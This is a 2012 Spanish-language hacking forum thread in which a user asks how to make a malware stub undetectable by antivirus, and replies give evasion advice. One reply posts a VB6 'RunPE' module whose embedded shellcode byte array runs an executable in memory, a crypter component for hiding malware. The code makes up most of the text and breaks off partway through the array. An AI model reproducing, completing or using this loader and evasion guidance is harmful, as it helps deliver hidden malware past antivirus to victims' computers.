elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [?] Indetectar Stub + Dudas
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [?] Indetectar Stub + Dudas  (Leído 5,166 veces)
MeCraniDOS


Desconectado Desconectado

Mensajes: 337


Sr. Glass


Ver Perfil
[?] Indetectar Stub + Dudas
« en: 16 Noviembre 2012, 20:43 pm »

Hola a todos, tengo un problema cuando intento indetectar un stub...
Llevo bastantes días siguiendo tutoriales por Internet de métodos para dejar un stub FUD, pero en vez de aprender, me frustro cada vez mas..  :-( :-(
Estoy siguiendo los vídeos de v0idh4ck3r, pero no hay manera de que me salga bien ninguno de esos métodos...  :huh: :huh:


Citar

He probado a indetectar desde source, y me detectan el stub mas antivirus que sin hacer ese método, también he probado el XOR y el MiniDLL y solo consigo que cambie el nombre de lo que detectan los antivirus, pero no sale ninguno...  :-\ :-\

Y con el AvFucker y el Dsplit me rompen todos y no queda ni uno vivo...  :¬¬

He probado a seguir el tutorial de [Zero], pero me pierdo en la mitad de cosas...


Citar

Ya había usado el OllyDbg antes, y el Editor Hex también, pero va a ser que no lo consigo hacer nada...

Podríais recomendarme algún tutorial para iniciarme en esto de indetectar servers/stubs??¿

(EDITO: He encontrado estos tutoriales, así que empezare cuanto antes... >:D )
(* Agradecería si alguien pudiera contestarme de todas formas a lo que he preguntado.. :( )

Citar
Citar

Otra duda que tengo, si creas una cifrado en ASM, luego puedes escribirla en el ollydbg, y crear una sección en el ejecutable o añadirla a una ya existente con el LordPE para llamar a esa función?¿

(Es una duda que tengo, ya que si eso se puede hacer, o algo similar, empezare a aprender ASM y la estructura PE, para indetectar así, aunque creo que esa es la mejor forma..  :silbar:

Gracias y Saludos
« Última modificación: 16 Noviembre 2012, 23:10 pm por MeCraniDOS » En línea

"La física es el sistema operativo del Universo"
     -- Steven R Garman
Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: [?] Indetectar Stub + Dudas
« Respuesta #1 en: 17 Noviembre 2012, 16:10 pm »

Cuando trabajar de source sabes lo que haces? o simplemente remplazas strings? o remplazas rutinas?

sabes que hace la edicion HEX, o con Olly? sabes en que se basan esos metodos? o lo haces al azar?.

porque te aseguro que con HEx,dsplit/dsplit-alternativo y algo mas se deja FUD.

si no sabes lo de arriba lo de hacer un cifrado en ASM e implementarlo lo veo muy difícil.
En línea

MeCraniDOS


Desconectado Desconectado

Mensajes: 337


Sr. Glass


Ver Perfil
Re: [?] Indetectar Stub + Dudas
« Respuesta #2 en: 17 Noviembre 2012, 22:55 pm »

Cuando trabajo desde source solo remplazo strings, cambio el RunPE y el tipo de cifrado... pero no me sirve para nada...  :-[

La edición con Hex y Olly la había usado antes para los crackme's y algunos otros programas sencillos, pero nunca para cifrar un archivo, por lo tanto lo único que hago es seguir tutoriales...

Y lo del Dsplit/Dsplit-alternativo/etc no se como se usa    :(, y cada tutorial que veo se hace de una forma diferente...  :-\

Soy nuevo en esto del cifrado, pero no se por donde cogerlo porque no encuentro ningun tutorial decente...  :(

Saludos
En línea

"La física es el sistema operativo del Universo"
     -- Steven R Garman
Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: [?] Indetectar Stub + Dudas
« Respuesta #3 en: 17 Noviembre 2012, 23:21 pm »

pues realmente lo que necesitas es practicar y mucha paciencia, aprender a programar como Karcrack&[Zero] y listo FUD.

O aprender a programar saber hacer funciones y MOD de códigos.

aquí te dejo este estúpida mod de un RunPE. espero te sirva de algo.

Código:
Option Explicit
 
'---------------------------------------------------------------------------------------
' Modulo   : mshRunPE_Strings
' Autor    : iCodeInVB6 + Modificado por Pink
' fecha      : 12/10/2012 11:40
' Funcion   : Correr Ejecutable en Memoria
'             Solo Usa CallWindowProc & shellcode
' Creditos   : hamavb <-- creador del shellcode!
' Probado   : Win7 x64/x86
'---------------------------------------------------------------------------------------
 
'USER32
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
 
Private Pink(1287) As Byte

 
Public Sub RunPE(ByVal ruta As String, binario() As Byte)
Pink(0) = &H60
Pink(1) = &HE8
Pink(2) = &H4E
Pink(3) = &H0
Pink(4) = &H0
Pink(5) = &H0
Pink(6) = &H6B
Pink(7) = &H0
Pink(8) = &H65
Pink(9) = &H0
Pink(10) = &H72
Pink(11) = &H0
Pink(12) = &H6E
Pink(13) = &H0
Pink(14) = &H65
Pink(15) = &H0
Pink(16) = &H6C
Pink(17) = &H0
Pink(18) = &H33
Pink(19) = &H0
Pink(20) = &H32
Pink(21) = &H0
Pink(22) = &H0
Pink(23) = &H0
Pink(24) = &H6E
Pink(25) = &H0
Pink(26) = &H74
Pink(27) = &H0
Pink(28) = &H64
Pink(29) = &H0
Pink(30) = &H6C
Pink(31) = &H0
Pink(32) = &H6C
Pink(33) = &H0
Pink(34) = &H0
Pink(35) = &H0
Pink(36) = &H0
Pink(37) = &H0
Pink(38) = &H0
Pink(39) = &H0
Pink(40) = &H0
Pink(41) = &H0
Pink(42) = &H0
Pink(43) = &H0
Pink(44) = &H0
Pink(45) = &H0
Pink(46) = &H0
Pink(47) = &H0
Pink(48) = &H0
Pink(49) = &H0
Pink(50) = &H0
Pink(51) = &H0
Pink(52) = &H0
Pink(53) = &H0
Pink(54) = &H0
Pink(55) = &H0
Pink(56) = &H0
Pink(57) = &H0
Pink(58) = &H0
Pink(59) = &H0
Pink(60) = &H0
Pink(61) = &H0
Pink(62) = &H0
Pink(63) = &H0
Pink(64) = &H0
Pink(65) = &H0
Pink(66) = &H0
Pink(67) = &H0
Pink(68) = &H0
Pink(69) = &H0
Pink(70) = &H0
Pink(71) = &H0
Pink(72) = &H0
Pink(73) = &H0
Pink(74) = &H0
Pink(75) = &H0
Pink(76) = &H0
Pink(77) = &H0
Pink(78) = &H0
Pink(79) = &H0
Pink(80) = &H0
Pink(81) = &H0
Pink(82) = &H0
Pink(83) = &H0
Pink(84) = &H5B
Pink(85) = &H8B
Pink(86) = &HFC
Pink(87) = &H6A
Pink(88) = &H42
Pink(89) = &HE8
Pink(90) = &HBB
Pink(91) = &H3
Pink(92) = &H0
Pink(93) = &H0
Pink(94) = &H8B
Pink(95) = &H54
Pink(96) = &H24
Pink(97) = &H28
Pink(98) = &H89
Pink(99) = &H11
Pink(100) = &H8B
Pink(101) = &H54
Pink(102) = &H24
Pink(103) = &H2C
Pink(104) = &H6A
Pink(105) = &H3E
Pink(106) = &HE8
Pink(107) = &HAA
Pink(108) = &H3
Pink(109) = &H0
Pink(110) = &H0
Pink(111) = &H89
Pink(112) = &H11
Pink(113) = &H6A
Pink(114) = &H4A
Pink(115) = &HE8
Pink(116) = &HA1
Pink(117) = &H3
Pink(118) = &H0
Pink(119) = &H0
Pink(120) = &H89
Pink(121) = &H39
Pink(122) = &H6A
Pink(123) = &H1E
Pink(124) = &H6A
Pink(125) = &H3C
Pink(126) = &HE8
Pink(127) = &H9D
Pink(128) = &H3
Pink(129) = &H0
Pink(130) = &H0
Pink(131) = &H6A
Pink(132) = &H22
Pink(133) = &H68
Pink(134) = &HF4
Pink(135) = &H0
Pink(136) = &H0
Pink(137) = &H0
Pink(138) = &HE8
Pink(139) = &H91
Pink(140) = &H3
Pink(141) = &H0
Pink(142) = &H0
Pink(143) = &H6A
Pink(144) = &H26
Pink(145) = &H6A
Pink(146) = &H24
Pink(147) = &HE8
Pink(148) = &H88
Pink(149) = &H3
Pink(150) = &H0
Pink(151) = &H0
Pink(152) = &H6A
Pink(153) = &H2A
Pink(154) = &H6A
Pink(155) = &H40
Pink(156) = &HE8
Pink(157) = &H7F
Pink(158) = &H3
Pink(159) = &H0
Pink(160) = &H0
Pink(161) = &H6A
Pink(162) = &H2E
Pink(163) = &H6A
Pink(164) = &HC
Pink(165) = &HE8
Pink(166) = &H76
Pink(167) = &H3
Pink(168) = &H0
Pink(169) = &H0
Pink(170) = &H6A
Pink(171) = &H32
Pink(172) = &H68
Pink(173) = &HC8
Pink(174) = &H0
Pink(175) = &H0
Pink(176) = &H0
Pink(177) = &HE8
Pink(178) = &H6A
Pink(179) = &H3
Pink(180) = &H0
Pink(181) = &H0
Pink(182) = &H6A
Pink(183) = &H2A
Pink(184) = &HE8
Pink(185) = &H5C
Pink(186) = &H3
Pink(187) = &H0
Pink(188) = &H0
Pink(189) = &H8B
Pink(190) = &H9
Pink(191) = &HC7
Pink(192) = &H1
Pink(193) = &H44
Pink(194) = &H0
Pink(195) = &H0
Pink(196) = &H0
Pink(197) = &H6A
Pink(198) = &H12
Pink(199) = &HE8
Pink(200) = &H4D
Pink(201) = &H3
Pink(202) = &H0
Pink(203) = &H0
Pink(204) = &H68
Pink(205) = &H5B
Pink(206) = &HE8
Pink(207) = &H14
Pink(208) = &HCF
Pink(209) = &H51
Pink(210) = &HE8
Pink(211) = &H79
Pink(212) = &H3
Pink(213) = &H0
Pink(214) = &H0
Pink(215) = &H6A
Pink(216) = &H3E
Pink(217) = &HE8
Pink(218) = &H3B
Pink(219) = &H3
Pink(220) = &H0
Pink(221) = &H0
Pink(222) = &H8B
Pink(223) = &HD1
Pink(224) = &H6A
Pink(225) = &H1E
Pink(226) = &HE8
Pink(227) = &H32
Pink(228) = &H3
Pink(229) = &H0
Pink(230) = &H0
Pink(231) = &H6A
Pink(232) = &H40
Pink(233) = &HFF
Pink(234) = &H32
Pink(235) = &HFF
Pink(236) = &H31
Pink(237) = &HFF
Pink(238) = &HD0
Pink(239) = &H6A
Pink(240) = &H12
Pink(241) = &HE8
Pink(242) = &H23
Pink(243) = &H3
Pink(244) = &H0
Pink(245) = &H0
Pink(246) = &H68
Pink(247) = &H5B
Pink(248) = &HE8
Pink(249) = &H14
Pink(250) = &HCF
Pink(251) = &H51
Pink(252) = &HE8
Pink(253) = &H4F
Pink(254) = &H3
Pink(255) = &H0
Pink(256) = &H0
Pink(257) = &H6A
Pink(258) = &H1E
Pink(259) = &HE8
Pink(260) = &H11
Pink(261) = &H3
Pink(262) = &H0
Pink(263) = &H0
Pink(264) = &H8B
Pink(265) = &H9
Pink(266) = &H8B
Pink(267) = &H51
Pink(268) = &H3C
Pink(269) = &H6A
Pink(270) = &H3E
Pink(271) = &HE8
Pink(272) = &H5
Pink(273) = &H3
Pink(274) = &H0
Pink(275) = &H0
Pink(276) = &H8B
Pink(277) = &H39
Pink(278) = &H3
Pink(279) = &HFA
Pink(280) = &H6A
Pink(281) = &H22
Pink(282) = &HE8
Pink(283) = &HFA
Pink(284) = &H2
Pink(285) = &H0
Pink(286) = &H0
Pink(287) = &H8B
Pink(288) = &H9
Pink(289) = &H68
Pink(290) = &HF8
Pink(291) = &H0
Pink(292) = &H0
Pink(293) = &H0
Pink(294) = &H57
Pink(295) = &H51
Pink(296) = &HFF
Pink(297) = &HD0
Pink(298) = &H6A
Pink(299) = &H0
Pink(300) = &HE8
Pink(301) = &HE8
Pink(302) = &H2
Pink(303) = &H0
Pink(304) = &H0
Pink(305) = &H68
Pink(306) = &H88
Pink(307) = &HFE
Pink(308) = &HB3
Pink(309) = &H16
Pink(310) = &H51
Pink(311) = &HE8
Pink(312) = &H14
Pink(313) = &H3
Pink(314) = &H0
Pink(315) = &H0
Pink(316) = &H6A
Pink(317) = &H2E
Pink(318) = &HE8
Pink(319) = &HD6
Pink(320) = &H2
Pink(321) = &H0
Pink(322) = &H0
Pink(323) = &H8B
Pink(324) = &H39
Pink(325) = &H6A
Pink(326) = &H2A
Pink(327) = &HE8
Pink(328) = &HCD
Pink(329) = &H2
Pink(330) = &H0
Pink(331) = &H0
Pink(332) = &H8B
Pink(333) = &H11
Pink(334) = &H6A
Pink(335) = &H42
Pink(336) = &HE8
Pink(337) = &HC4
Pink(338) = &H2
Pink(339) = &H0
Pink(340) = &H0
Pink(341) = &H57
Pink(342) = &H52
Pink(343) = &H6A
Pink(344) = &H0
Pink(345) = &H6A
Pink(346) = &H0
Pink(347) = &H6A
Pink(348) = &H4
Pink(349) = &H6A
Pink(350) = &H0
Pink(351) = &H6A
Pink(352) = &H0
Pink(353) = &H6A
Pink(354) = &H0
Pink(355) = &H6A
Pink(356) = &H0
Pink(357) = &HFF
Pink(358) = &H31
Pink(359) = &HFF
Pink(360) = &HD0
Pink(361) = &H6A
Pink(362) = &H12
Pink(363) = &HE8
Pink(364) = &HA9
Pink(365) = &H2
Pink(366) = &H0
Pink(367) = &H0
Pink(368) = &H68
Pink(369) = &HD0
Pink(370) = &H37
Pink(371) = &H10
Pink(372) = &HF2
Pink(373) = &H51
Pink(374) = &HE8
Pink(375) = &HD5
Pink(376) = &H2
Pink(377) = &H0
Pink(378) = &H0
Pink(379) = &H6A
Pink(380) = &H22
Pink(381) = &HE8
Pink(382) = &H97
Pink(383) = &H2
Pink(384) = &H0
Pink(385) = &H0
Pink(386) = &H8B
Pink(387) = &H11
Pink(388) = &H6A
Pink(389) = &H2E
Pink(390) = &HE8
Pink(391) = &H8E
Pink(392) = &H2
Pink(393) = &H0
Pink(394) = &H0
Pink(395) = &H8B
Pink(396) = &H9
Pink(397) = &HFF
Pink(398) = &H72
Pink(399) = &H34
Pink(400) = &HFF
Pink(401) = &H31
Pink(402) = &HFF
Pink(403) = &HD0
Pink(404) = &H6A
Pink(405) = &H0
Pink(406) = &HE8
Pink(407) = &H7E
Pink(408) = &H2
Pink(409) = &H0
Pink(410) = &H0
Pink(411) = &H68
Pink(412) = &H9C
Pink(413) = &H95
Pink(414) = &H1A
Pink(415) = &H6E
Pink(416) = &H51
Pink(417) = &HE8
Pink(418) = &HAA
Pink(419) = &H2
Pink(420) = &H0
Pink(421) = &H0
Pink(422) = &H6A
Pink(423) = &H22
Pink(424) = &HE8
Pink(425) = &H6C
Pink(426) = &H2
Pink(427) = &H0
Pink(428) = &H0
Pink(429) = &H8B
Pink(430) = &H11
Pink(431) = &H8B
Pink(432) = &H39
Pink(433) = &H6A
Pink(434) = &H2E
Pink(435) = &HE8
Pink(436) = &H61
Pink(437) = &H2
Pink(438) = &H0
Pink(439) = &H0
Pink(440) = &H8B
Pink(441) = &H9
Pink(442) = &H6A
Pink(443) = &H40
Pink(444) = &H68
Pink(445) = &H0
Pink(446) = &H30
Pink(447) = &H0
Pink(448) = &H0
Pink(449) = &HFF
Pink(450) = &H72
Pink(451) = &H50
Pink(452) = &HFF
Pink(453) = &H77
Pink(454) = &H34
Pink(455) = &HFF
Pink(456) = &H31
Pink(457) = &HFF
Pink(458) = &HD0
Pink(459) = &H6A
Pink(460) = &H36
Pink(461) = &HE8
Pink(462) = &H47
Pink(463) = &H2
Pink(464) = &H0
Pink(465) = &H0
Pink(466) = &H8B
Pink(467) = &HD1
Pink(468) = &H6A
Pink(469) = &H22
Pink(470) = &HE8
Pink(471) = &H3E
Pink(472) = &H2
Pink(473) = &H0
Pink(474) = &H0
Pink(475) = &H8B
Pink(476) = &H39
Pink(477) = &H6A
Pink(478) = &H3E
Pink(479) = &HE8
Pink(480) = &H35
Pink(481) = &H2
Pink(482) = &H0
Pink(483) = &H0
Pink(484) = &H8B
Pink(485) = &H31
Pink(486) = &H6A
Pink(487) = &H22
Pink(488) = &HE8
Pink(489) = &H2C
Pink(490) = &H2
Pink(491) = &H0
Pink(492) = &H0
Pink(493) = &H8B
Pink(494) = &H1
Pink(495) = &H6A
Pink(496) = &H2E
Pink(497) = &HE8
Pink(498) = &H23
Pink(499) = &H2
Pink(500) = &H0
Pink(501) = &H0
Pink(502) = &H8B
Pink(503) = &H9
Pink(504) = &H52
Pink(505) = &HFF
Pink(506) = &H77
Pink(507) = &H54
Pink(508) = &H56
Pink(509) = &HFF
Pink(510) = &H70
Pink(511) = &H34
Pink(512) = &HFF
Pink(513) = &H31
Pink(514) = &H6A
Pink(515) = &H0
Pink(516) = &HE8
Pink(517) = &H10
Pink(518) = &H2
Pink(519) = &H0
Pink(520) = &H0
Pink(521) = &H68
Pink(522) = &HA1
Pink(523) = &H6A
Pink(524) = &H3D
Pink(525) = &HD8
Pink(526) = &H51
Pink(527) = &HE8
Pink(528) = &H3C
Pink(529) = &H2
Pink(530) = &H0
Pink(531) = &H0
Pink(532) = &H83
Pink(533) = &HC4
Pink(534) = &HC
Pink(535) = &HFF
Pink(536) = &HD0
Pink(537) = &H6A
Pink(538) = &H12
Pink(539) = &HE8
Pink(540) = &HF9
Pink(541) = &H1
Pink(542) = &H0
Pink(543) = &H0
Pink(544) = &H68
Pink(545) = &H5B
Pink(546) = &HE8
Pink(547) = &H14
Pink(548) = &HCF
Pink(549) = &H51
Pink(550) = &HE8
Pink(551) = &H25
Pink(552) = &H2
Pink(553) = &H0
Pink(554) = &H0
Pink(555) = &H6A
Pink(556) = &H22
Pink(557) = &HE8
Pink(558) = &HE7
Pink(559) = &H1
Pink(560) = &H0
Pink(561) = &H0
Pink(562) = &H8B
Pink(563) = &H11
Pink(564) = &H83
Pink(565) = &HC2
Pink(566) = &H6
Pink(567) = &H6A
Pink(568) = &H3A
Pink(569) = &HE8
Pink(570) = &HDB
Pink(571) = &H1
Pink(572) = &H0
Pink(573) = &H0
Pink(574) = &H6A
Pink(575) = &H2
Pink(576) = &H52
Pink(577) = &H51
Pink(578) = &HFF
Pink(579) = &HD0
Pink(580) = &H6A
Pink(581) = &H36
Pink(582) = &HE8
Pink(583) = &HCE
Pink(584) = &H1
Pink(585) = &H0
Pink(586) = &H0
Pink(587) = &HC7
Pink(588) = &H1
Pink(589) = &H0
Pink(590) = &H0
Pink(591) = &H0
Pink(592) = &H0
Pink(593) = &HB8
Pink(594) = &H28
Pink(595) = &H0
Pink(596) = &H0
Pink(597) = &H0
Pink(598) = &H6A
Pink(599) = &H36
Pink(600) = &HE8
Pink(601) = &HBC
Pink(602) = &H1
Pink(603) = &H0
Pink(604) = &H0
Pink(605) = &HF7
Pink(606) = &H21
Pink(607) = &H6A
Pink(608) = &H1E
Pink(609) = &HE8
Pink(610) = &HB3
Pink(611) = &H1
Pink(612) = &H0
Pink(613) = &H0
Pink(614) = &H8B
Pink(615) = &H11
Pink(616) = &H8B
Pink(617) = &H52
Pink(618) = &H3C
Pink(619) = &H81
Pink(620) = &HC2
Pink(621) = &HF8
Pink(622) = &H0
Pink(623) = &H0
Pink(624) = &H0
Pink(625) = &H3
Pink(626) = &HD0
Pink(627) = &H6A
Pink(628) = &H3E
Pink(629) = &HE8
Pink(630) = &H9F
Pink(631) = &H1
Pink(632) = &H0
Pink(633) = &H0
Pink(634) = &H3
Pink(635) = &H11
Pink(636) = &H6A
Pink(637) = &H26
Pink(638) = &HE8
Pink(639) = &H96
Pink(640) = &H1
Pink(641) = &H0
Pink(642) = &H0
Pink(643) = &H6A
Pink(644) = &H28
Pink(645) = &H52
Pink(646) = &HFF
Pink(647) = &H31
Pink(648) = &H6A
Pink(649) = &H12
Pink(650) = &HE8
Pink(651) = &H8A
Pink(652) = &H1
Pink(653) = &H0
Pink(654) = &H0
Pink(655) = &H68
Pink(656) = &H5B
Pink(657) = &HE8
Pink(658) = &H14
Pink(659) = &HCF
Pink(660) = &H51
Pink(661) = &HE8
Pink(662) = &HB6
Pink(663) = &H1
Pink(664) = &H0
Pink(665) = &H0
Pink(666) = &H83
Pink(667) = &HC4
Pink(668) = &HC
Pink(669) = &HFF
Pink(670) = &HD0
Pink(671) = &H6A
Pink(672) = &H26
Pink(673) = &HE8
Pink(674) = &H73
Pink(675) = &H1
Pink(676) = &H0
Pink(677) = &H0
Pink(678) = &H8B
Pink(679) = &H39
Pink(680) = &H8B
Pink(681) = &H9
Pink(682) = &H8B
Pink(683) = &H71
Pink(684) = &H14
Pink(685) = &H6A
Pink(686) = &H3E
Pink(687) = &HE8
Pink(688) = &H65
Pink(689) = &H1
Pink(690) = &H0
Pink(691) = &H0
Pink(692) = &H3
Pink(693) = &H31
Pink(694) = &H6A
Pink(695) = &H26
Pink(696) = &HE8
Pink(697) = &H5C
Pink(698) = &H1
Pink(699) = &H0
Pink(700) = &H0
Pink(701) = &H8B
Pink(702) = &H9
Pink(703) = &H8B
Pink(704) = &H51
Pink(705) = &HC
Pink(706) = &H6A
Pink(707) = &H22
Pink(708) = &HE8
Pink(709) = &H50
Pink(710) = &H1
Pink(711) = &H0
Pink(712) = &H0
Pink(713) = &H8B
Pink(714) = &H9
Pink(715) = &H3
Pink(716) = &H51
Pink(717) = &H34
Pink(718) = &H6A
Pink(719) = &H46
Pink(720) = &HE8
Pink(721) = &H44
Pink(722) = &H1
Pink(723) = &H0
Pink(724) = &H0
Pink(725) = &H8B
Pink(726) = &HC1
Pink(727) = &H6A
Pink(728) = &H2E
Pink(729) = &HE8
Pink(730) = &H3B
Pink(731) = &H1
Pink(732) = &H0
Pink(733) = &H0
Pink(734) = &H8B
Pink(735) = &H9
Pink(736) = &H50
Pink(737) = &HFF
Pink(738) = &H77
Pink(739) = &H10
Pink(740) = &H56
Pink(741) = &H52
Pink(742) = &HFF
Pink(743) = &H31
Pink(744) = &H6A
Pink(745) = &H0
Pink(746) = &HE8
Pink(747) = &H2A
Pink(748) = &H1
Pink(749) = &H0
Pink(750) = &H0
Pink(751) = &H68
Pink(752) = &HA1
Pink(753) = &H6A
Pink(754) = &H3D
Pink(755) = &HD8
Pink(756) = &H51
Pink(757) = &HE8
Pink(758) = &H56
Pink(759) = &H1
Pink(760) = &H0
Pink(761) = &H0
Pink(762) = &H83
Pink(763) = &HC4
Pink(764) = &HC
Pink(765) = &HFF
Pink(766) = &HD0
Pink(767) = &H6A
Pink(768) = &H36
Pink(769) = &HE8
Pink(770) = &H13
Pink(771) = &H1
Pink(772) = &H0
Pink(773) = &H0
Pink(774) = &H8B
Pink(775) = &H11
Pink(776) = &H83
Pink(777) = &HC2
Pink(778) = &H1
Pink(779) = &H89
Pink(780) = &H11
Pink(781) = &H6A
Pink(782) = &H3A
Pink(783) = &HE8
Pink(784) = &H5
Pink(785) = &H1
Pink(786) = &H0
Pink(787) = &H0
Pink(788) = &H8B
Pink(789) = &H9
Pink(790) = &H3B
Pink(791) = &HCA
Pink(792) = &HF
Pink(793) = &H85
Pink(794) = &H33
Pink(795) = &HFF
Pink(796) = &HFF
Pink(797) = &HFF
Pink(798) = &H6A
Pink(799) = &H32
Pink(800) = &HE8
Pink(801) = &HF4
Pink(802) = &H0
Pink(803) = &H0
Pink(804) = &H0
Pink(805) = &H8B
Pink(806) = &H9
Pink(807) = &HC7
Pink(808) = &H1
Pink(809) = &H7
Pink(810) = &H0
Pink(811) = &H1
Pink(812) = &H0
Pink(813) = &H6A
Pink(814) = &H0
Pink(815) = &HE8
Pink(816) = &HE5
Pink(817) = &H0
Pink(818) = &H0
Pink(819) = &H0
Pink(820) = &H68
Pink(821) = &HD2
Pink(822) = &HC7
Pink(823) = &HA7
Pink(824) = &H68
Pink(825) = &H51
Pink(826) = &HE8
Pink(827) = &H11
Pink(828) = &H1
Pink(829) = &H0
Pink(830) = &H0
Pink(831) = &H6A
Pink(832) = &H32
Pink(833) = &HE8
Pink(834) = &HD3
Pink(835) = &H0
Pink(836) = &H0
Pink(837) = &H0
Pink(838) = &H8B
Pink(839) = &H11
Pink(840) = &H6A
Pink(841) = &H2E
Pink(842) = &HE8
Pink(843) = &HCA
Pink(844) = &H0
Pink(845) = &H0
Pink(846) = &H0
Pink(847) = &H8B
Pink(848) = &H9
Pink(849) = &H52
Pink(850) = &HFF
Pink(851) = &H71
Pink(852) = &H4
Pink(853) = &HFF
Pink(854) = &HD0
Pink(855) = &H6A
Pink(856) = &H22
Pink(857) = &HE8
Pink(858) = &HBB
Pink(859) = &H0
Pink(860) = &H0
Pink(861) = &H0
Pink(862) = &H8B
Pink(863) = &H39
Pink(864) = &H83
Pink(865) = &HC7
Pink(866) = &H34
Pink(867) = &H6A
Pink(868) = &H32
Pink(869) = &HE8
Pink(870) = &HAF
Pink(871) = &H0
Pink(872) = &H0
Pink(873) = &H0
Pink(874) = &H8B
Pink(875) = &H31
Pink(876) = &H8B
Pink(877) = &HB6
Pink(878) = &HA4
Pink(879) = &H0
Pink(880) = &H0
Pink(881) = &H0
Pink(882) = &H83
Pink(883) = &HC6
Pink(884) = &H8
Pink(885) = &H6A
Pink(886) = &H2E
Pink(887) = &HE8
Pink(888) = &H9D
Pink(889) = &H0
Pink(890) = &H0
Pink(891) = &H0
Pink(892) = &H8B
Pink(893) = &H11
Pink(894) = &H6A
Pink(895) = &H46
Pink(896) = &HE8
Pink(897) = &H94
Pink(898) = &H0
Pink(899) = &H0
Pink(900) = &H0
Pink(901) = &H51
Pink(902) = &H6A
Pink(903) = &H4
Pink(904) = &H57
Pink(905) = &H56
Pink(906) = &HFF
Pink(907) = &H32
Pink(908) = &H6A
Pink(909) = &H0
Pink(910) = &HE8
Pink(911) = &H86
Pink(912) = &H0
Pink(913) = &H0
Pink(914) = &H0
Pink(915) = &H68
Pink(916) = &HA1
Pink(917) = &H6A
Pink(918) = &H3D
Pink(919) = &HD8
Pink(920) = &H51
Pink(921) = &HE8
Pink(922) = &HB2
Pink(923) = &H0
Pink(924) = &H0
Pink(925) = &H0
Pink(926) = &H83
Pink(927) = &HC4
Pink(928) = &HC
Pink(929) = &HFF
Pink(930) = &HD0
Pink(931) = &H6A
Pink(932) = &H22
Pink(933) = &HE8
Pink(934) = &H6F
Pink(935) = &H0
Pink(936) = &H0
Pink(937) = &H0
Pink(938) = &H8B
Pink(939) = &H9
Pink(940) = &H8B
Pink(941) = &H51
Pink(942) = &H28
Pink(943) = &H3
Pink(944) = &H51
Pink(945) = &H34
Pink(946) = &H6A
Pink(947) = &H32
Pink(948) = &HE8
Pink(949) = &H60
Pink(950) = &H0
Pink(951) = &H0
Pink(952) = &H0
Pink(953) = &H8B
Pink(954) = &H9
Pink(955) = &H81
Pink(956) = &HC1
Pink(957) = &HB0
Pink(958) = &H0
Pink(959) = &H0
Pink(960) = &H0
Pink(961) = &H89
Pink(962) = &H11
Pink(963) = &H6A
Pink(964) = &H0
Pink(965) = &HE8
Pink(966) = &H4F
Pink(967) = &H0
Pink(968) = &H0
Pink(969) = &H0
Pink(970) = &H68
Pink(971) = &HD3
Pink(972) = &HC7
Pink(973) = &HA7
Pink(974) = &HE8
Pink(975) = &H51
Pink(976) = &HE8
Pink(977) = &H7B
Pink(978) = &H0
Pink(979) = &H0
Pink(980) = &H0
Pink(981) = &H6A
Pink(982) = &H32
Pink(983) = &HE8
Pink(984) = &H3D
Pink(985) = &H0
Pink(986) = &H0
Pink(987) = &H0
Pink(988) = &H8B
Pink(989) = &HD1
Pink(990) = &H6A
Pink(991) = &H2E
Pink(992) = &HE8
Pink(993) = &H34
Pink(994) = &H0
Pink(995) = &H0
Pink(996) = &H0
Pink(997) = &H8B
Pink(998) = &H9
Pink(999) = &HFF
Pink(1000) = &H32
Pink(1001) = &HFF
Pink(1002) = &H71
Pink(1003) = &H4
Pink(1004) = &HFF
Pink(1005) = &HD0
Pink(1006) = &H6A
Pink(1007) = &H0
Pink(1008) = &HE8
Pink(1009) = &H24
Pink(1010) = &H0
Pink(1011) = &H0
Pink(1012) = &H0
Pink(1013) = &H68
Pink(1014) = &H88
Pink(1015) = &H3F
Pink(1016) = &H4A
Pink(1017) = &H9E
Pink(1018) = &H51
Pink(1019) = &HE8
Pink(1020) = &H50
Pink(1021) = &H0
Pink(1022) = &H0
Pink(1023) = &H0
Pink(1024) = &H6A
Pink(1025) = &H2E
Pink(1026) = &HE8
Pink(1027) = &H12
Pink(1028) = &H0
Pink(1029) = &H0
Pink(1030) = &H0
Pink(1031) = &H8B
Pink(1032) = &H9
Pink(1033) = &HFF
Pink(1034) = &H71
Pink(1035) = &H4
Pink(1036) = &HFF
Pink(1037) = &HD0
Pink(1038) = &H6A
Pink(1039) = &H4A
Pink(1040) = &HE8
Pink(1041) = &H4
Pink(1042) = &H0
Pink(1043) = &H0
Pink(1044) = &H0
Pink(1045) = &H8B
Pink(1046) = &H21
Pink(1047) = &H61
Pink(1048) = &HC3
Pink(1049) = &H8B
Pink(1050) = &HCB
Pink(1051) = &H3
Pink(1052) = &H4C
Pink(1053) = &H24
Pink(1054) = &H4
Pink(1055) = &HC3
Pink(1056) = &H6A
Pink(1057) = &H0
Pink(1058) = &HE8
Pink(1059) = &HF2
Pink(1060) = &HFF
Pink(1061) = &HFF
Pink(1062) = &HFF
Pink(1063) = &H68
Pink(1064) = &H54
Pink(1065) = &HCA
Pink(1066) = &HAF
Pink(1067) = &H91
Pink(1068) = &H51
Pink(1069) = &HE8
Pink(1070) = &H1E
Pink(1071) = &H0
Pink(1072) = &H0
Pink(1073) = &H0
Pink(1074) = &H6A
Pink(1075) = &H40
Pink(1076) = &H68
Pink(1077) = &H0
Pink(1078) = &H10
Pink(1079) = &H0
Pink(1080) = &H0
Pink(1081) = &HFF
Pink(1082) = &H74
Pink(1083) = &H24
Pink(1084) = &H18
Pink(1085) = &H6A
Pink(1086) = &H0
Pink(1087) = &HFF
Pink(1088) = &HD0
Pink(1089) = &HFF
Pink(1090) = &H74
Pink(1091) = &H24
Pink(1092) = &H14
Pink(1093) = &HE8
Pink(1094) = &HCF
Pink(1095) = &HFF
Pink(1096) = &HFF
Pink(1097) = &HFF
Pink(1098) = &H89
Pink(1099) = &H1
Pink(1100) = &H83
Pink(1101) = &HC4
Pink(1102) = &H10
Pink(1103) = &HC3
Pink(1104) = &HE8
Pink(1105) = &H22
